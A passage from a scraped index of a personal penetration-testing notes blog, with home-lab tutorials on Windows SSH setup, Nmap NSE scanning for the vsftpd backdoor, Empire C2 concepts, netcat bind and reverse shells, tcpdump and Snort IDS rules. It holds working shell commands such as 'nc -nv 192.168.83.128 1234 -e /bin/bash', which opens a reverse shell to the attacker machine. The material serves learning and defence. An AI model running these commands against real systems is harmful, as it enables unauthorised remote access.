net user victim Password123 /add Add another user\nNew-LocalUser -Name \u0026#34;sysadmin\u0026#34; -Password (ConvertTo-SecureString \u0026#34;Password123\u0026#34; -AsPlainText -Force) Now let\u0026rsquo;s try to connect from our kali machine using the command: ssh USERNAME@WINDOWS_SERVER_IP OUR VULNERABLE SERVER IS SET UP TO PERFORM SOME ATTACKS, LET\u0026rsquo;S DO IT IN THE NEXT SECTION.\nChecking logs and setting up the OpenSSH log facility: By default the logs for ssh connections will be shown in the Event Viewer; let\u0026rsquo;s check them through some powershell commands: # To see the last 20 log entries: Get-WinEvent -LogName OpenSSH/Operational -MaxEvents 20 # To find only successful connections: Get-WinEvent -LogName OpenSSH/Operational | Where-Object { $_.Message -like \u0026#34;*Accepted password*\u0026#34; } # To find failed connections (brute-force scenario): Get-WinEvent -LogName OpenSSH/Operational | Where-Object { $_.Message -like \u0026#34;*Failed password*\u0026#34; } 2. Setting up sshd.log from the sshd_config file: 3. Open the config file using notepad and uncomment these two options: 4. Then change SyslogFacility AUTH to SyslogFacility LOCAL0 ; LogLevel INFO is fine, or you can set LogLevel DEBUG 5. Restart the sshd service\nRestart-Service sshd After doing that, logs will start appearing in C:\\ProgramData\\ssh\\logs\\sshd.log ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/01-misconfiguring-ssh-on-windows-server/","title":"Misconfiguring SSH on Windows Server"},{"content":" Threat actors and Advanced Persistent Threat (APT) groups are always thinking about clever techniques and strategies to compromise their next target. A technique that is commonly used by threat actors is implementing C2 operations to centrally manage compromised hosts over the internet. 
A threat actor will set up one or more C2 servers on the internet that serve the purpose of centrally managing infected and compromised systems, uploading data from the compromised hosts, and downloading additional malware onto newly infected devices. Note These C2 servers also serve as update servers for malware such as ransomware. When ransomware infects a new device, most malware is designed to establish a connection to designated C2 servers on the internet to download updates, which ensures cybersecurity professionals are not able to eradicate/remove the malware infection from the host.\nOnce the C2 servers are deployed on the internet, the threat actor will attempt to infect the targeted systems, with a bot using various techniques, ranging from social engineering campaigns to infecting trusted web servers to host driveby-downloads of malicious payloads on visitors’ computers. Once a bot is installed on a host device, it will attempt to establish a connection to its designated C2 server to download updates and listen for incoming instructions. Note A bot, short for robot, is an application that’s created by a threat actor to perform automated tasks such as malicious activities like performing Distributed Denial-of-Service (DDoS) attacks, sending spam and phishing emails to targets, and even spreading malware. Bots are usually installed on compromised systems and retrieve instructions from a C2 server that is managed by a threat actor.\nAs more devices are infected over time with the bot, it becomes a botnet, an army of zombie machines that can be controlled by the threat actor. Setting up c2 operations: One of the coolest features of Empire 5 is the ability to deploy it using a client-server model. This allows you to set up a centralized C2 server anywhere, such as on the cloud or even on-premises on an organization’s network. 
You can create multiple user accounts on the Empire server to allow access to additional penetration testers who are working on the same penetration test engagement as you. They can use the Empire client to individually log in to the same Empire server and work together. Empire client-server model: Before getting started, keep in mind that you will need two Kali Linux virtual machines. One machine will be hosting the Empire server while another will be used as the Empire client. For this exercise, we will be using two separate Kali Linux machines to demonstrate how to deploy Empire using the client-server model. CLONING THE KALI machine:\nOpen vmware -\u0026gt; power off the kali vm, right click on it -\u0026gt; manage -\u0026gt; clone -\u0026gt; full clone -\u0026gt; select the disk where you want to store the machine. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/01-usecases-of-c2/","summary":"\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eThreat actors and Advanced Persistent Threat (APT)\u003c/code\u003e groups are always thinking about clever techniques and strategies to compromise their next target. A technique that is commonly used by threat actors is implementing C2 operations to centrally manage compromised hosts over the internet. 
A threat actor will set up one or more C2 servers on the internet that serve the purpose of centrally managing infected and compromised systems, uploading data from the compromised hosts, and downloading additional malware onto newly infected devices.\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eThese C2 servers also serve as update servers for malware such as ransomware. When ransomware infects a new device, most malware is designed to establish a connection to designated C2 servers on the internet to download updates, which ensures cybersecurity professionals are not able to eradicate/remove the malware infection from the host.\u003c/p\u003e","title":"Use Cases of Command and Control"},{"content":"The Nmap Scripting Engine (NSE) is one of the most powerful features within Nmap. It allows penetration testers and security researchers to create, automate, and perform customized scanning on a target system or network. 
When using NSE, the scanning techniques are usually aggressive and can sometimes create data loss or even crash a target system.\nNSE script types: Auth: This category contains scripts that can scan a target to detect whether authentication bypass is possible. Broadcast: This category contains scripts that are used to discover host systems on a network. Brute: This category contains scripts that are used to perform some types of bruteforce attacks on a remote server to gain unauthorized access. Default: This category contains a set of default scripts within NSE for scanning. Discovery: This category contains scripts that are used in active information gathering regarding network services on a target. \u0026quot;DoS\u0026quot;: This category contains scripts that can simulate a Denial-of-Service (DoS) attack on a target to check whether the target is susceptible to such types of attacks. Exploit: This category contains scripts that are used to actively exploit security vulnerabilities on a target. External: This category contains scripts that usually send data that\u0026rsquo;s been gathered from a target to an external resource for further processing. Fuzzer: This category contains scripts that are used to send random data into an application to discover any software bugs and vulnerabilities within applications. Intrusive: This category contains high-risk scripts that can crash systems and cause data loss. Malware: This category contains scripts that can determine whether a target is infected with malware. Safe: This category contains scripts that are not intrusive and safe to use on a target system. Version: This category contains scripts that are used to gather the version information of services on a target system. Vuln: This category contains scripts that are used to check for specific vulnerabilities on a target system. 
Performing scan using NSE: nmap --script ftp-vsftpd-backdoor 172.30.1.134 -p 21 The --script option allows you to specify either a single script, multiple scripts, or a category of scripts. We also saw that the target machine is exploitable: 2. I searched for the version name and its exploit, and found one: 3. Additionally, within Kali Linux, there is a tool known as searchsploit that allows you to perform a query/search for exploits within the offline version of Exploit-DB on Kali Linux 4. Open msfconsole, search for vsftpd 2.3.4 5. Select that exploit using the command use 0, then show info 6. If you want to execute an entire category of scripts in NSE, you can use --script \u0026lt;category-name\u0026gt;\nnmap --script vuln 172.30.1.134 A large amount of information will be printed by Nmap ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/01-vulnerability-discovery-using-nmap/","summary":"\u003cp\u003eThe \u003ccode\u003eNmap Scripting Engine (NSE)\u003c/code\u003e is one of the most powerful features within Nmap. It allows penetration testers and security researchers to create, automate, and perform customized scanning on a target system or network. 
When using NSE, the scanning techniques are usually aggressive and can sometimes create data loss or even crash a target system.\u003c/p\u003e\n\u003ch2 id=\"nse-script-types\"\u003eNSE script types:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAuth\u003c/code\u003e: This category contains scripts that can scan a target to detect whether authentication bypass is possible.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eBroadcast\u003c/code\u003e: This category contains scripts that are used to discover host systems on a network.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eBrute\u003c/code\u003e: This category contains scripts that are used to perform some types of bruteforce attacks on a remote server to gain unauthorized access.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDefault\u003c/code\u003e: This category contains a set of default scripts within NSE for scanning.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDiscovery\u003c/code\u003e: This category contains scripts that are used in active information gathering regarding network services on a target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e\u0026quot;DoS\u0026quot;\u003c/code\u003e: This category contains scripts that can simulate a Denial-of-Service (DoS) attack on a target to check whether the target is susceptible to such types of attacks.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExploit\u003c/code\u003e: This category contains scripts that are used to actively exploit security vulnerabilities on a target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExternal\u003c/code\u003e: This category contains scripts that usually send data that\u0026rsquo;s been gathered from a target to an external resource for further processing.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFuzzer\u003c/code\u003e: This category contains scripts that are used to send random data into an application to discover any software bugs and vulnerabilities within 
applications.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eIntrusive\u003c/code\u003e: This category contains high-risk scripts that can crash systems and cause data loss.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eMalware\u003c/code\u003e: This category contains scripts that can determine whether a target is infected with malware.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSafe\u003c/code\u003e: This category contains scripts that are not intrusive and safe to use on a target system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVersion\u003c/code\u003e: This category contains scripts that are used to gather the version information of services on a target system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVuln\u003c/code\u003e: This category contains scripts that are used to check for specific vulnerabilities on a target system.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch3 id=\"performing-scan-using-nse\"\u003ePerforming scan using NSE:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap --script ftp-vsftpd-backdoor 172.30.1.134 -p \u003cspan class=\"m\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"nse_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_1.png\"\u003e\nThe \u003ccode\u003e--script\u003c/code\u003e command allows you to specify either a single script, multiple scripts, or a category of scripts. We also saw that the target machine is exploitable:\n\u003cimg alt=\"nse_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_2.png\"\u003e\n2. I searched up for the version name and it\u0026rsquo;s exploit , we got one:\n\u003cimg alt=\"nse_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_3.png\"\u003e\n3. 
Additionally, within Kali Linux, there is a tool known as \u003ccode\u003esearchsploit\u003c/code\u003e that allows you to perform a query/search for exploits within the offline version of Exploit-DB on Kali Linux\n\u003cimg alt=\"nse_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_4.png\"\u003e\n4. Open \u003ccode\u003emsfconsole\u003c/code\u003e , search for \u003ccode\u003evsftpd 2.3.4\u003c/code\u003e\n\u003cimg alt=\"nse_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_5.png\"\u003e\n5. use that exploit using the command \u003ccode\u003euse 0\u003c/code\u003e , then \u003ccode\u003eshow info\u003c/code\u003e\n\u003cimg alt=\"nse_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/01/nse_6.png\"\u003e\n6. If you want to execute an entire category of scripts in NSE, you can use the \u0026ndash;script \u003ccode\u003e\u0026lt;category-name\u0026gt;\u003c/code\u003e\u003c/p\u003e","title":"Vulnerability Discovery Using Nmap"},{"content":"Bind shells are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as Bourne Again Shell (Bash) on Linux or Command Prompt on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system.\nThe following are common attributes of a bind shell for penetration testers: • Bind shells are shells that are bound to a specific port to create a listener for incoming connections from a remote machine. • When a remote machine establishes a connection to the targeted system that is running the listener on the specific bind port, a shell is spawned between the remote machine and the targeted system, therefore, providing remote access to the targeted system. 
• Bind shells are commonly used by penetration testers when the IP address of the targeted system is known and a listener can be configured on it.\nImportant On a NAT-enabled router, the private source IPv4 address is translated into the public IPv4 address on the internet-facing interface on the router before it’s sent on the internet. This means that internet-connected devices will see the sender’s address as the public IPv4 address on the router or modem and not the private IPv4 address of the client on the private network. NAT prevents direct connections between source and destination devices. To learn more about NAT, please visit https://www.comptia.org/content/guides/what-is-network-address-translation.\nThe penetration tester can use Netcat, Ncat, and even Metasploit to set up bind shells between target and attacker machines. These common cybersecurity tools are very useful for binding an IP address and port number for listeners. Keep in mind that once a shell is established between systems, the penetration tester will be able to remotely execute commands on the targeted system over a network.\nThe following are common attributes of a reverse shell for penetration testers: • Penetration testers set up a listener on the attacker machine and send instructions to the targeted system to establish a call-back session. • When the targeted system establishes a session to the listener on the attacker machine, a shell is spawned, which enables the penetration tester to remotely execute commands on the target. • Reverse shells are commonly used when the penetration tester does not have direct access to the targeted machine that is behind a NAT-enabled router or firewall. 
Therefore, it is less complex for the compromised system to establish an outbound connection to the internet.\nSetting up netcat: We are going to connect to the target machine, which can be either a linux or windows machine:\nPower on the Kali Linux virtual machine, open the Terminal, and use the following command to create a Netcat listener (without -e this is a plain listener; binding the native bash shell to it is shown in the bind shell section below) nc -nvlp 1234 The following is a breakdown of the preceding command: • -n: This specifies to use the IP address only and not perform Domain Name System (DNS) queries • -l: This specifies to listen for incoming connections • -v: This specifies using the verbose mode • -p: This specifies the listening port number\nThen power on the target virtual machine; in my case I will be turning on UBUNTU-SERVER from the PENTEST-NET network. We need to transfer the netcat executable to the ubuntu machine. You can use any linux/windows machine to perform this task. Make sure for a windows machine you have transferred the nc.exe using the upcoming steps, and for linux you may have already installed nc by default.\nLet\u0026rsquo;s set up a python web server for transferring files: # on kali cd /usr/share/windows-binaries python3 -m http.server 8080 if 8080 is already in use, try another port like 8000 Got it.\nNow open up the ubuntu\u0026rsquo;s browser, head over to your kali\u0026rsquo;s IP along with the port like this: kali_ip:8000 Now let\u0026rsquo;s connect from the ubuntu machine to the kali: nc -nv kali_ip 1234 You will be connected and able to send messages.\nAfter the connection we can share messages like this: To terminate the session, use the Ctrl + Z key combination on the keyboard. Note If you want to use metasploitable 2 linux for performing this practical, I don\u0026rsquo;t know if it comes with wget or not by default. 
If so then you can use wget kali_ip:port_number/nc.exe to get the file from the web server and perform the nc shell practical\nSetting up a bind shell: Power on the Kali Linux virtual machine, open the Terminal, and use the following command to create a Netcat listener that binds the native bash shell to the listener: nc -nvlp 1234 -e /bin/bash Tip If setting up the listener on a Microsoft Windows system, the nc -nlvp 1234 -e cmd.exe command will enable you to bind the Windows Command Prompt to the listener using Netcat.\nNow establish the connection from the ubuntu machine: nc -nv 192.168.83.128 1234 Tip To get a Linux Terminal interface when using a bind shell, use the python -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' command.\nSetting up a reverse shell: In this scenario the UBUNTU-SERVER will initiate a connection to our listener. Setting up the listener on kali linux: nc -nvlp 1234 Initiating the connection from UBUNTU-SERVER: Before that, install netcat-traditional on ubuntu by using the command: sudo apt install netcat-traditional Then set it as the default by using the command sudo update-alternatives --config nc and choosing the option /bin/nc.traditional Then run the following command: nc -nv 192.168.83.128 1234 -e /bin/bash That completes the setup. Let\u0026rsquo;s check out the results and shell upgradation techniques: shell upgradation: I tried to look for python but it wasn\u0026rsquo;t installed, then I looked for perl; it was installed but not working, I don\u0026rsquo;t know why. Then I found a command by googling, script /dev/null -c bash, which gave me an interactive shell: Perl and python shell upgradation commands:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; perl -e \u0026#39;exec \u0026#34;/bin/sh\u0026#34;;\u0026#39; perl -e \u0026#39;exec \u0026#34;/bin/bash\u0026#34;;\u0026#39; Having completed this section, you have learned how to create a reverse shell using Netcat. 
However, keep in mind that Netcat does not encrypt messages between the Netcat client and server, which can lead to detection. However, it’s worth noting that both Ncat and Socat can be used to provide data encryption between host systems when working with remote shells.\nImportant To learn more about Ncat, please visit https://nmap.org/ncat/guide/index.html. To learn more about Socat, please visit https://www.redhat.com/sysadmin/gettingstarted-socat.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/01-working-with-bind-and-reverse-shells/","summary":"\u003cp\u003e\u003ccode\u003eBind shells\u003c/code\u003e are commonly used by penetration testers to logically set up a service port in a listening state on a targeted system while binding the listening service port to a native shell such as \u003ccode\u003eBourne Again Shell (Bash)\u003c/code\u003e on Linux or \u003ccode\u003eCommand Prompt\u003c/code\u003e on Windows; this is commonly referred to as a listener. Once the penetration tester initiates a connection to the listener and a session is established, the penetration tester will gain access to the targeted system’s native shell, whether it’s Bash on Linux or Command Prompt on a Windows-based system.\u003c/p\u003e","title":"Working With Bind and Reverse Shells"},{"content":" Note Tcpdump is a network sniffing tool. Same as Wireshark but tcpdump is CLI based.\nPractical usecase: Listing all the network interfaces in our machine: tcpdump -D 2. 
Sniffing traffic from our interface:\nsudo tcpdump -i ens33{mention_your_own_interface_name} ICMP traffic(ping): To get the desired output as shown use your kali machine to ping the machine which is running tcpdump\nformat of the traffic: {timeframe{hh:mm:ss}:microsecond} {source_ip} \u0026gt; {Destination_ip} {request/reply}, {id}, {sequence number} {data length}\nnmap SYN scan traffic:\nTo get the desired output as shown use your kali machine to run nmap to the machine which is running tcpdump. Used nmap command for this practical - {nmap -sS target_ip_running_tcpdump}\nTraffic format: {timeframe{hh:mm:ss}:microsecond} {source_ip:source port} \u0026gt; {Destination_ip:destination_port} {Flags {SYN/S}} {packet sequence number} {window size} {maximum segment size/mss} {data length}\nOther useful commands of tcpdump: tcpdump -c N # capturing N number of packets where N \u0026gt; 0 tcpdump -w captured_packet.pcap # capture the packets and write into a file tcpdump -r captured_packet.pcap # reading from a pre-saved pcap file tcpdump -ttt # capture packets with proper readable timestamp tcpdump -i eth0 port 22 # capturing incoming traffic specific to ssh/port 22 tcpdump -i eth0 src 192.168.83.128 # capturing traffic those are having source ip as 192.168.83.128 tcpdump -i eth0 dst 192.168.83.145 # capturing traffic that are having destination ip as 192.168.83.145 ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/tcpdump/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 
37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eTcpdump is a network sniffing tool. Same as Wireshark but tcpdump is CLI based.\u003c/p\u003e","title":"Practical Demo: tcpdump"},{"content":"This is going to be a very raw blog, mostly about what I am going to post in the next few months, and what I have been doing for the past few weeks.\nSo, let\u0026rsquo;s start with what I was doing\u0026hellip;\nAfter completing eJPT certification and learning the basics as well as core concepts of system administration, I got my hands dirty on CTF platforms like HTB. I took a one-month subscription just to get the experience of it. But not gonna lie, it was not what I expected. First of all, playing CTFs on these platforms are very good for many people, and the platforms do a great job. But I didn\u0026rsquo;t like the CTFish or more like obviously vulnerable experience. I thought the normal HTB boxes would replicate real-world scenarios—hardened systems where normal scans easily fail, and where initial access depends on phishing, social engineering, or hardcore OSINT rather than an obvious open port. That wasn\u0026rsquo;t what I found. But definately HTB is a great platform for sharpening your skills under time pressure.\nLater I realized that I could get this experience through HTB pro boxes(not sure though), but I don\u0026rsquo;t have the money for it. So I decided to make my own home lab. I took the PNPT course offered by TCM Security. 
It was hands-on, very good for beginners who want to learn how actual real-world pentest workflows work. After that, I expanded my lab. Let me give you an overview of what my lab includes:\nATTACK-NET : kali linux PENTEST-NET : metasploitable2 linux, kioptrix, DEV, Black Pearl, UBUNTU-SERVER EXTERNAL-RED : Win server 2019(fully custom, I do the administrative configs on it) PIVOT-NET : THEPUNISHER(win 10 enterprise), THESUPERMAN(win 10 enterprise) SECURE-NET : Windows server 2022 This is my home lab. I do all of my experiments in this whole lab. I have made 3 custom networks to simulate a real-world scenario in vmware. My PIVOT-NET and SECURE-NET machines are totally isolated from the internet. Later I will share the entire lab setup I created for my home lab through a blog/sharing my notes.\nAlong with all of this stuff, I was confused about whether I should do any more certifications or learn by myself through blogs/articles/books. After 1.5 months of procrastination, I got stuck in a situation where I couldn\u0026rsquo;t decide whether I should do HTB CPTS for knowledge or learn from books.\nFinally, I convinced myself that I would go for books, not certifications. But the problem is that I don\u0026rsquo;t have a lot of money to purchase hacking books, because they are all so expensive for me. So I downloaded PDF copies that are available on the internet for free and started learning.\nI started reading books this month. Currently, I am reading The Ultimate Kali Linux Book, Third Edition, and Automation using Python. These two are my go-tos. Let me tell you now after reading half of both books that this was my best decision for learning and moving forward in this field. Maybe this can differ for you, but for me, this is the right way. I have noticed significant changes in my notes and knowledge since I started using books consistently. 
I will also share those notes in my blog\u0026rsquo;s notes section.\nTakeaway from all this thinking: Take your time and think wisely about what you want to do and how you want to do it\u0026hellip; don\u0026rsquo;t just believe my opinion, either. This is very important. If you don\u0026rsquo;t think carefully and just jump into something, maybe it can work, but that\u0026rsquo;s just gambling. Take your time to think.\nI don\u0026rsquo;t know how much this strategy will work for me in the future, but I will just keep moving with this because I am loving this way.\nNow what I will be posting next: In the next few months, I will try to post my Pentesting notes along the way of the book\u0026rsquo;s progress. I will also post about different forensics techniques. Starting in November, I might jump into web application security if possible.\n","permalink":"https://0x-s0M3n4th.github.io/blogs/blog_1/","summary":"\u003cp\u003eThis is going to be a very raw blog, mostly about what I am going to post in the next few months, and what I have been doing for the past few weeks.\u003c/p\u003e\n\u003cp\u003eSo, \u003cem\u003elet\u0026rsquo;s start with what I was doing\u0026hellip;\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eAfter completing \u003ccode\u003eeJPT\u003c/code\u003e certification and learning the basics as well as core concepts of \u003ccode\u003esystem administration\u003c/code\u003e, I got my hands dirty on \u003ccode\u003eCTF platforms\u003c/code\u003e like \u003ccode\u003eHTB\u003c/code\u003e. I took a one-month subscription just to get the experience of it. But not gonna lie, it was not what I expected. First of all, playing \u003ccode\u003eCTFs\u003c/code\u003e on these platforms is very good for many people, and the platforms do a great job. But I didn\u0026rsquo;t like the \u003ccode\u003eCTFish\u003c/code\u003e or more like \u003ccode\u003eobviously vulnerable\u003c/code\u003e experience. 
I thought the normal HTB boxes would replicate real-world scenarios—hardened systems where normal scans easily fail, and where initial access depends on phishing, social engineering, or hardcore OSINT rather than an obvious open port. That wasn\u0026rsquo;t what I found. But definitely \u003ccode\u003eHTB\u003c/code\u003e is a great platform for sharpening your skills under time pressure.\u003c/p\u003e","title":"Why i chose books over certs!"},{"content":"\nHow snort works: snort IDS network implementation: Lab environment: we are not going to use this lab env just for the sake of simplicity of this exercise. Installing snort on ubuntu 20.04 LTS : Before installing make sure promisc mode is on. While installing you will be prompted to provide the interface name and subnet range sudo apt-get install snort -y cd /etc/snort # The snort config files are stored there only Now we need to make a backup of the snort config files -\u0026gt; to copy the file we need to have elevated privileges. cp snort.conf snort-backup.conf We are going to make most of the changes inside the snort.conf, the first thing we need to do is to set up the subnet range that will be used by snort -\u0026gt; vim snort.conf Now we need to disable all the community rules provided inside the config files as we are going to make our own rules. Comment out all the community rules. Except the local rules file, comment everything below it, till this line -\u0026gt; After that we will set up our own rules. Come inside the rules folder, there will be a file named local.rules -\u0026gt; vim /rules/local.rules I have made a first rule for detecting ICMP packets inside our network -\u0026gt; Breakdown of the command -\u0026gt; alert -\u0026gt; It is used for sending an alert when ICMP packets are detected. icmp -\u0026gt; protocol name, also ping sweeps essentially utilize ICMP requests. 
any -> the first 'any' is the source address: match ICMP coming from any network. any -> the second 'any' is the source port: match requests coming from any port. $HOME_NET -> the destination address: ICMP destined for our home network, which has been configured inside snort.conf. Remember the subnet range. any -> the destination port. Ping does not use ports, so it is set to 'any' here (ICMP rules ignore the port fields anyway). After this we need to specify the rule options -> (msg:\"YOUR MESSAGE\"; sid:<unique id>; rev:1;) msg -> the alert message text. sid -> signature id; use a unique value, and for local rules use 1000000 or above, because the lower SIDs are reserved for the official rule sets. rev -> revision number of the rule; bump it whenever the rule changes. Note that the direction operator is -> (source -> destination). Now we need to run snort -> snort -q -l /var/log/snort/ -i ens33 -A console -c /etc/snort/snort.conf Then ping from any device to any other device within your network subnet; snort will capture those pings and give us alerts. Now I will set up another rule for ssh auth -> vim /etc/snort/rules/local.rules Rule -> In this scenario I am using a vulnerable machine, metasploitable2. Now start snort again with the same command. Then I ssh from my kali machine to 'metasploitable2' -> And everything is detected. SNORPY tool: Making an ftp alert rule using the snorpy tool, specifically for traffic coming into the metasploitable2 machine -> Adjust the rule and copy-paste it inside the local.rules file. 
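The rule header and options broken down above, and the one-line alerts that -A console / -A fast print, as an added Python example (this is not code from the notes): it assembles a local.rules file from those fields and parses the alert lines so rule hits can be counted per source. The SSH and FTP rule bodies are my reconstruction of the rules the notes only show as screenshots, 192.168.83.140 and the alert lines are constructed sample data, and sid 1000000 and above is Snort's reserved range for local rules.

```python
import re
from collections import Counter

# Added example for the rule breakdown above; it is not code from the notes.
# make_rule() assembles a Snort 2.x rule from the header fields the breakdown
# describes (action proto src sport -> dst dport) plus the msg/sid/rev options,
# and parse_fast_alert() reads the one-line alerts that -A console / -A fast
# produce.  The SSH and FTP rule bodies are my reconstruction of the rules the
# notes show as screenshots; 192.168.83.140 and the alert lines are constructed
# sample data.

LOCAL_SID_START = 1000000   # SIDs below this are reserved for the official rule sets


def make_rule(proto, src, sport, dst, dport, msg, sid, rev=1, options=(), action='alert'):
    """Return one rule: action proto src sport -> dst dport (msg; options; sid; rev;)."""
    if sid < LOCAL_SID_START:
        raise ValueError('local rules should use sid >= %d (got %d)' % (LOCAL_SID_START, sid))
    if proto == 'icmp' and (sport != 'any' or dport != 'any'):
        raise ValueError('ICMP has no ports; use any for both port fields')
    opts = ['msg:"%s"' % msg] + list(options) + ['sid:%d' % sid, 'rev:%d' % rev]
    return '%s %s %s %s -> %s %s (%s;)' % (action, proto, src, sport, dst, dport, '; '.join(opts))


def build_local_rules(rules):
    """Join rules into local.rules content, refusing duplicate SIDs (snort would too)."""
    seen = set()
    for rule in rules:
        sid = int(re.search(r'sid:(\d+)', rule).group(1))
        if sid in seen:
            raise ValueError('duplicate sid %d' % sid)
        seen.add(sid)
    return '\n'.join(rules) + '\n'


RULES = [
    make_rule('icmp', 'any', 'any', '$HOME_NET', 'any', 'ICMP ping detected', 1000001),
    # flags:S -> one alert per connection attempt (SYN) instead of one per packet
    make_rule('tcp', 'any', 'any', '$HOME_NET', '22', 'SSH connection attempt', 1000002,
              options=('flags:S',)),
    make_rule('tcp', 'any', 'any', '192.168.83.140', '21', 'FTP login to metasploitable2', 1000003,
              options=('flow:to_server,established', 'content:"USER "', 'nocase')),
]

# One alert per line, the layout -A fast writes to <logdir>/alert:
# <timestamp>  [**] [gid:sid:rev] <msg> [**] [Priority: n] {PROTO} src[:port] -> dst[:port]
FAST_ALERT = re.compile(
    r'^(?P<ts>\S+)\s+\[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.*?) \[\*\*\] '
    r'(?:\[Classification: [^\]]+\] )?\[Priority: (?P<prio>\d+)\] \{(?P<proto>\w+)\} '
    r'(?P<src>[\d.]+)(?::(?P<sport>\d+))? -> (?P<dst>[\d.]+)(?::(?P<dport>\d+))?$')


def parse_fast_alert(line):
    """Dict of the alert fields, or None for a line that is not an alert."""
    m = FAST_ALERT.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields['sid'] = int(fields['sid'])
    return fields


def count_by_rule_and_source(lines):
    """Counter of (sid, source IP) -> alert count; malformed lines are skipped."""
    counts = Counter()
    for line in lines:
        alert = parse_fast_alert(line)
        if alert:
            counts[(alert['sid'], alert['src'])] += 1
    return counts


def noisy_sources(lines, sid, threshold):
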